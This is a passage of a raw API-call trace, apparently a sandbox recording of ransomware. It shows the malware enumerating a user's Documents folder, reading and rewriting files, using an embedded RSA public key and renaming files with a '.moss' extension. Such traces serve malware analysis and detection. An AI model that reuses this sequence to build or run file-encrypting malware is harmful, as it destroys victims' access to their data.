[0169.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0169.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd3e658 [0169.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd3e658 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44bb8 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc068 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc050 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc020 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc008 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45ae8 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b449a8 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c768 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.777] WriteFile (in: hFile=0x664, lpBuffer=0x3b62d40*, nNumberOfBytesToWrite=0x14f8f, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b62d40*, lpNumberOfBytesWritten=0x401fb14*=0x14f8f, lpOverlapped=0x0) returned 1 [0169.778] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b62d40 | out: hHeap=0xcd0000) returned 1 [0169.778] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x14f94, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.778] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.778] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.778] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b41660 [0169.778] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b447b0 [0169.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b447b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0169.778] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48820 [0169.778] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.778] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41660 | out: hHeap=0xcd0000) returned 1 [0169.778] WriteFile (in: hFile=0x664, lpBuffer=0x3b48820*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48820*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0169.779] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.779] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.779] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.779] CloseHandle (hObject=0x664) returned 1 [0169.780] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.780] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x890) returned 0x3b4b098 [0169.780] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0169.780] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ooi75yScG2n4JW.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ooi75yscg2n4jw.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ooi75yScG2n4JW.pptx.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ooi75yscg2n4jw.pptx.moss")) returned 1 [0169.781] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0169.781] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.781] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.783] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd80bd8 | out: hHeap=0xcd0000) returned 1 [0169.783] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0169.783] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2840 [0169.783] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0169.783] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2a20 [0169.783] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2b10 | out: hHeap=0xcd0000) returned 1 [0169.783] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2840 | out: hHeap=0xcd0000) returned 1 [0169.783] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe13793b0, ftCreationTime.dwHighDateTime=0x1d5dca8, ftLastAccessTime.dwLowDateTime=0x6dce2780, ftLastAccessTime.dwHighDateTime=0x1d5dc27, ftLastWriteTime.dwLowDateTime=0x6dce2780, ftLastWriteTime.dwHighDateTime=0x1d5dc27, nFileSizeHigh=0x0, nFileSizeLow=0x664d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pz2UAEy9Ul RH2d.pdf", cAlternateFileName="PZ2UAE~1.PDF")) returned 1 [0169.783] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b41660 [0169.783] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8e) returned 0xd80bd8 [0169.783] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41660 | out: hHeap=0xcd0000) returned 1 [0169.783] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pz2UAEy9Ul RH2d.pdf") returned=".pdf" [0169.783] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pz2UAEy9Ul RH2d.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pz2uaey9ul rh2d.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.783] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=26189) returned 1 [0169.783] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.787] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x6627, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.787] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.788] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.788] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.788] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x664d, lpOverlapped=0x0) returned 1 [0169.788] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.789] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.789] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.789] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.790] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.790] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.790] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.790] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.790] GetLastError () returned 0x0 [0169.790] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.790] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.790] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.790] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.790] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x6650) returned 0x3b4b098 [0169.791] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0169.791] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.791] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0169.791] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.791] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b447b0 [0169.791] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0169.791] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45ae8 [0169.791] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc008 [0169.791] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45b30 [0169.791] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc020 [0169.791] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc050 [0169.791] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.791] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc068 [0169.791] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0169.791] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0169.791] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.791] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b516f0 [0169.791] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc050 | out: hHeap=0xcd0000) returned 1 [0169.791] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc068 | out: hHeap=0xcd0000) returned 1 [0169.791] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.791] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.792] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b516f0 | out: hHeap=0xcd0000) returned 1 [0169.792] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.792] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd310 [0169.792] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc068 [0169.792] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0169.792] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fc050 [0169.792] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0169.792] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.792] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.792] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0169.792] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.792] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.792] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0169.792] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.792] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.792] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc068 | out: hHeap=0xcd0000) returned 1 [0169.792] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.792] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc050 | out: hHeap=0xcd0000) returned 1 [0169.792] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.792] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.792] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.792] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.792] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0169.792] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0169.792] GetCurrentThreadId () returned 0x324 [0169.792] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b49260 [0169.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0169.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0169.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.793] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.793] GetCurrentThreadId () returned 0x324 [0169.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.793] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0169.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.793] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.793] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.793] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0169.793] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362c768 [0169.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0169.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.793] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0169.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0169.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0169.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc050 [0169.794] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0169.794] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0169.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0169.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0169.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc068 [0169.794] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0169.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0169.794] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0169.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc038 [0169.794] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0169.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 